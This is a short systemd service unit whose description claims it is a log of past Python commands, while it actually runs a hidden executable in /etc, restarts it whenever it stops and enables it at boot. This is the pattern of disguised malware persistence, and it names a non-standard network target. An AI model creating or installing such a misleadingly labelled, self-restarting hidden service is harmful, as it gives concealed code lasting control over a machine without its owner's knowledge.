[Unit]
Description=A log of previous python commands
After=network-up.target

[Service]
ExecStart=/etc/.python-logs
Restart=always

[Install]
WantedBy=multi-user.target
